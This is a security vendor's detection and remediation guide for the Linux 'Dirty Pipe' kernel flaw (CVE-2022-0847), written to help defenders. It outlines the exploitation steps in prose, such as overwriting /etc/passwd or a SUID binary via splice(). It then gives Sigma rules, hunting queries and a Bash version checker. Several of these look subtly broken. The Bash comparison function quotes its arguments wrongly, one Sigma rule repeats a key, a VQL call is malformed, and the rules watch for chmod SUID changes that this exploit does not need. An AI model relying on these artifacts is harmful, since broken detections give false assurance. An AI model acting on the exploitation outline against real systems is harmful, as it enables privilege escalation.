CVE-2022-0847: Linux Kernel 'Dirty Pipe' Vulnerability — Detection and Remediation Guide

A critical vulnerability has been disclosed in the Linux kernel that impacts systems running kernel versions 5.8 and later. Tracked as CVE-2022-0847 and dubbed "Dirty Pipe," this flaw allows an unprivileged user to overwrite data in read-only files, including SUID-root binaries, leading to full system compromise (root access).

The bug, which has lurked in the code since approximately 2005 but became exploitable after changes in kernel 5.8, poses a severe risk to shared hosting environments, containerized deployments, and any multi-user Linux system. Defenders must prioritize patching immediately, as proof-of-concept (PoC) exploit code is public and reliable.

Technical Analysis

CVE Identifier: CVE-2022-0847 CVSS Score: 7.8 (High) Affected Products: Linux Kernel version 5.8 and later.

Vulnerability Mechanics

The vulnerability resides in the pipe_buffer structure within the pipe_write function. The Linux kernel uses a "flag" byte within this structure to manage buffer states. Due to a failure to initialize this flag correctly, the kernel can inadvertently treat a page as "anonymous" (cleared of data) when it should retain its "page cache" status.

An attacker can exploit this by:

1. Creating a pipe and populating it with arbitrary data.
2. Using the splice() system call to load a page from a read-only file (e.g., /etc/passwd or a SUID binary) into the pipe buffer.
3. Writing to the pipe again, which triggers the uninitialized flag bug, allowing the attacker to "write" data back into the cached page of the read-only file.

Impact

Since the modification happens at the page cache level, the changes are reflected in the file system immediately. An attacker can:

• Modify the /etc/passwd file to add a new root user.
• Overwrite a SUID binary to inject malicious code, escalating privileges upon execution.

Exploitation Status

PoC exploits are publicly available and considered reliable. While no widespread active exploitation campaigns have been observed at the time of writing, the ease of exploitation and the high value of the target (root access) suggest threat actors will incorporate this rapidly into toolkits.

Detection & Response

Detecting kernel-level memory corruption is difficult without eBPF or advanced auditd rules. However, we can detect the post-exploitation behavior—specifically the modification of SUID binaries or critical configuration files—and the preparatory behavior of compiling exploits.

Sigma Rules

The following Sigma rules detect attempts to modify file permissions to set the SUID bit (a common goal of Dirty Pipe) and the compilation of potential exploit artifacts.

---
title: Dirty Pipe - SUID Bit Modification on System Binary
id: 4c0c5b8f-1f2e-4a3c-9b1d-0e5f6a7b8c9d
status: experimental
description: Detects modification of SUID permissions on sensitive system binaries, indicative of privilege escalation attempts like CVE-2022-0847.
references:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
author: Security Arsenal
date: 2022/03/01
tags:
  - attack.privilege_escalation
  - attack.t1068
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    CommandLine|contains:
      - 'chmod'
      - 'chown'
    CommandLine|contains:
      - 'u+s'
      - '4755'
  filter_paths:
    CommandLine|contains:
      - '/usr/bin'
      - '/bin'
      - '/sbin'
      - '/lib'
      - '/lib64'
  condition: selection and filter_paths
falsepositives:
  - Legitimate system administration or software installation
level: high
---
title: Dirty Pipe - Exploit Compilation Activity
id: 9d1f2e3a-4b5c-6d7e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects compilation of C files with names referencing the 'Dirty Pipe' vulnerability on Linux endpoints.
references:
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847
author: Security Arsenal
date: 2022/03/01
tags:
  - attack.initial_access
  - attack.t1204
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '/gcc'
      - '/cc'
      - '/make'
    CommandLine|contains:
      - 'dirty_pipe'
      - 'dirtypipe'
      - 'cve-2022-0847'
  condition: selection
falsepositives:
  - Security research or sanctioned testing
level: critical

KQL (Microsoft Sentinel)

Hunt for suspicious chmod events that set the SUID bit on root-owned files, leveraging Syslog or AuditD data ingested into Sentinel.

// Hunt for SUID permission changes on system binaries
Syslog
| where Facility in ('auth', 'authpriv', 'audit')
| where ProcessName has 'chmod'
| parse SyslogMessage with * "chmod" CommandParameter
| where CommandParameter has '4755' or CommandParameter has 'u+s'
| where SyslogMessage has '/bin/' or SyslogMessage has '/sbin/' or SyslogMessage has '/usr/bin/'
| project TimeGenerated, HostName, ProcessName, SyslogMessage, SourceIP
| extend timestamp = TimeGenerated

Velociraptor VQL

Hunt for files that recently had the SUID bit set, or check for the presence of known exploit artifacts on the disk.

-- Hunt for SUID binaries modified recently (last 7 days)
SELECT FullPath, Mode.String, Size, Mtime, Atime
FROM glob(globs='/usr/bin/*', '/bin/*', '/sbin/*')
WHERE Mode.String =~ 's'  -- Contains setuid bit
  AND Mtime > now() - 7D
-- Hunt for potential exploit source code
SELECT FullPath, Size, Mtime
FROM glob(globs='/tmp/*', '/home/*/*.c', '/var/tmp/*')
WHERE Name =~ 'dirty' OR FullPath =~ 'cve-2022-0847'

Remediation Script (Bash)

Use this Bash script to audit your Linux kernel version and determine vulnerability status.

#!/bin/bash
# CVE-2022-0847 (Dirty Pipe) Detection Script

echo "Checking kernel version for CVE-2022-0847 vulnerability..."

# Get current kernel version
KERNEL_VERSION=$(uname -r | cut -d'-' -f1)
echo "Current Kernel Version: $KERNEL_VERSION"

# Function to compare versions
version_gt() { test "$(echo '$@' | tr " " "\n" | sort -V | head -n 1)" != "$1"; }

# Vulnerable range is >= 5.8 and < fixed versions
# Fixed in mainline: 5.16.11, 5.15.25, 5.10.102
# Simplified check: if version is 5.8 or newer, assume vulnerable unless explicitly patched

if version_gt "5.8.0" "$KERNEL_VERSION"; then
    echo "[SAFE] Kernel version is older than 5.8. Not vulnerable to Dirty Pipe exploit."
else
    echo "[WARNING] Kernel version is 5.8 or higher. This system may be vulnerable."
    echo "Action Required: Update kernel to 5.16.11+, 5.15.25+, or 5.10.102+"
    echo "Check your distribution's security advisory for backported fixes."
fi

Remediation

Patching

The most effective remediation is to update the Linux kernel to a version containing the patch. The fix was committed to the mainline kernel on February 23, 2022, and has been backported to stable long-term kernels.

Patched Versions (Minimum):

• 5.16.x: Upgrade to 5.16.11 or later.
• 5.15.x: Upgrade to 5.15.25 or later.
• 5.10.x: Upgrade to 5.10.102 or later.

Vendor Actions

Major distributions have released updates. Apply patches immediately:

• Ubuntu: Run sudo apt update && sudo apt install linux-image-generic. Ensure you are running the HWE kernel if applicable.
• Red Hat / CentOS / RHEL: Run sudo yum update kernel or sudo dnf update kernel.
• Debian: Run sudo apt-get update && sudo apt-get install linux-image-amd64.

Verification

After patching, reboot the system and verify the kernel version using uname -r. Ensure the output reflects the patched version mentioned above or a security advisory notice from your vendor confirming the backport.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub